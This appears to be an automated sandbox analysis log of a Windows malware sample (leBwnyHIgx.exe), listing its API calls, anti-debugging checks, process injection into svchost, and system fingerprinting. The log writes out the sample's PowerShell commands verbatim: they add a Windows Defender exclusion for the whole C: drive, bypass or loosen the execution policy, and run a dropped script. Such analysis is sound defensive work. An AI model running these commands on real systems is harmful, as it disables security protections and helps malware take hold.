                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10016A5E
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_10016D55 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10016D55
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00CE6D2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CE6D2C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,5_2_0307DF10
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0307F00A
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03081F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_03081F67
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02718587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_02718587
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02716815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_02716815
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_10016A5E
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_10016D55 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_10016D55
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00DA6D2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00DA6D2C

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_030777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,5_2_030777E0
                      Contains functionality to inject threads in other processes
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_030777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,5_2_030777E0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe5_2_030777E0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe5_2_030777E0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0063DDA4 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,0_2_0063DDA4
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe "C:\Users\user\AppData\Roaming\leBwnyHIgx.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_005B20A4 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,0_2_005B20A4
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_005B1248 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,0_2_005B1248
                      Source: leBwnyHIgx.exe, 00000005.00000002.4135196957.0000000004571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager0
                      Source: leBwnyHIgx.exe, 00000005.00000003.2107248320.0000000004221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.4 0 min287400Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_004067C0 cpuid 0_2_004067C0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,0_2_0040C9BC
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: GetLocaleInfoW,0_2_005FB6B8
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0040BE44
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,5_2_0040C9BC
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: GetLocaleInfoW,5_2_005FB6B8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_0040BE44
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,5_2_03075430
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
